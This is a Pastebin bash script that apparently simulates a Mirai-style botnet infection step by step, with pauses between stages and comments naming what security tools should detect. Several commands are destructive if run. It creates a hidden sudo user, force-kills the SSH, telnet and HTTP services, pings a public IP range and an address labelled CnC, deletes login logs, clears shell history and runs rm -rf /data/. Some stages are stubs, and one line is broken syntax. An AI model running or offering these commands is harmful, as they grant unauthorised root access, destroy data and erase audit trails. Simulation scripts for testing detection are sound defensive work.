SHARE
TWEET

Untitled

a guest Sep 11th, 2019 97 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # Running from within the attacked device
  3.  
  4. # Local host reconnaissance detected
  5. echo "###################################################################"
  6. echo "      Conducting Reconnaissance                                    "
  7. echo "###################################################################"
  8.        
  9.     echo "Conducting analysis of host data..."
  10.     uname -a
  11.     echo "Got host data"
  12.     read -p "Press enter to continue attack"
  13.  
  14. # Detected suspicious use of the useradd command
  15. echo "###################################################################"
  16. echo "      Create User and Escalate Privilege                           "
  17. echo "###################################################################"
  18.  
  19.     USER="privilegeduser"${RANDOM}""
  20.    
  21.     echo "Adding user named ${USER} with privilege root to the system..."
  22.     useradd $USER
  23.     sudo usermod -aG sudo $USER
  24.     echo "Successfully added user named /"${USER}/" with privilege root to the system"
  25.     read -p "Press enter to continue attack"
  26.  
  27. # Process running on multiple ports, Process killing other processes
  28. echo "###################################################################"
  29. echo "      Kill SSH, Telnet and HTTP to hijack ports 23, 22, 80         "
  30. echo "            Original logs from Mirai killer.c actor                "
  31. echo "###################################################################"
  32.  
  33.     # port 23
  34.     echo "[killer] Trying to kill port 23"
  35.     echo "[killer] Finding and killing processes holding port 23"
  36.     kill -9 $(lsof -i:23 -t) 2> /dev/null
  37.     echo "[killer] Killed tcp/23 (telnet)"
  38.     # insert connect to port
  39.     echo "[killer] Bound to tcp/23 (Telnet)\n"
  40.  
  41.     # port 22
  42.     echo "[killer] Trying to kill port 22"
  43.     echo "[killer] Finding and killing processes holding port 22"
  44.     kill -9 $(lsof -i:22 -t) 2> /dev/null
  45.     echo "[killer] Killed tcp/22 (SSH)"
  46.     # insert connect to port
  47.     echo "[killer] Bound to tcp/22 (SSH)\n"
  48.  
  49.     # port 80
  50.     echo "[killer] Trying to kill port 80"
  51.     echo "[killer] Finding and killing processes holding port 80"
  52.     kill -9 $(lsof -i:80 -t) 2> /dev/null
  53.     echo "[killer] Killed tcp/80 (http)"
  54.     # insert connect to port
  55.     echo "[killer] Bound to tcp/80 (http)\n"
  56.     read -p "Press enter to continue attack"
  57.  
  58.  
  59. echo "###################################################################"
  60. echo "      Find and Kill Competing Malware                              "
  61. echo "###################################################################"
  62.  
  63.     echo "Looking for competing malware..."
  64.     kill -9 $(pgrep anime) 2> /dev/null
  65.     echo "Killing .anime malware process..."
  66.     echo "[killer] Finished"
  67.     read -p "Press enter to continue attack"
  68.  
  69.  
  70. echo "###################################################################"
  71. echo "      Scan The Network for More Volunrable Devices                 "
  72. echo "        Original logs from Mirai scanner.c actor                   "
  73. echo "###################################################################"
  74.  
  75.     printf("[scanner] Scanner process initialized. Scanning started..."
  76.     IPCIDR=13.92.249.
  77.     for ((i=0; i<20; i++))
  78.     do
  79.         IP=$IPCIDR${i}
  80.         echo "pinging ${IP}"
  81.         ping -c3 $IP
  82.     done
  83.     read -p "Press enter to continue attack"
  84.  
  85. # Reverse shells, Suspicious IP address communication, Possible backdoor detected
  86. echo "###################################################################"
  87. echo "      Communicating with CnC for getting attack commands           "
  88. echo "###################################################################"
  89.  
  90.     echo "Setting up a backdoor..."
  91.     touch d-bus notifier
  92.     echo "Backdoor set up" 
  93.  
  94.     echo "Opening reverse shell..."
  95.     bash /dev/tcp/
  96.     echo "Reverse shell established"
  97.    
  98.     echo "Communicating with CnC server..."
  99.     ping -c3 110.249.212.46 > pingtoCnC.txt
  100.     echo "Listening to CnC for future attack commands..."
  101.     read -p "Press enter to continue attack"
  102.  
  103.  
  104. # Removal of system logs files detected, Potential overriding of common files,
  105. echo "###################################################################"
  106. echo "      Covering Tracks - Deleting Logs and Executables"
  107. echo "###################################################################"
  108.  
  109.  
  110.     echo "Removing system logs..."
  111.     rm /var/log/lastlog
  112.     echo "Removed system logs"
  113.    
  114.     echo "Overriding linux system files..."
  115.     cp /bin/netstat a
  116.     echo "Overrode linux system files"
  117.  
  118.     echo "Deleting history files..."
  119.     history -c
  120.     echo "Deleted history files"
  121.     read -p "Press enter to continue attack"
  122.  
  123.  
  124. echo "*******************************************************************"
  125. echo "*******************************************************************"
  126. echo "         Mirai Botnet Expansion Scenarios                          "
  127. echo "*******************************************************************"
  128. echo "*******************************************************************"
  129.     read -p "Press enter to continue attack"
  130.  
  131.  
  132. # Crypto Coin Miner
  133. echo "###################################################################"
  134. echo "  Mirai Variant - Mining Crypto Currency Using the Botnet          "
  135. echo "###################################################################"
  136.    
  137.     echo "Setting up crypto miner..."
  138.     git clone https://github.com/cpuminer
  139.     echo "Mining crypto with device resources"
  140.     read -p "Press enter to continue attack"
  141.  
  142. # Possible loss of data detected
  143. echo "###################################################################"
  144. echo "   Fish Tank Scenario - Egress Data Through IoT Device             "
  145. echo "###################################################################"
  146.    
  147.     echo "Sending data collected through the device..."
  148.     rm -rf /data/
  149.     echo "Sent data"
  150.     read -p "Press enter to continue attack"
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top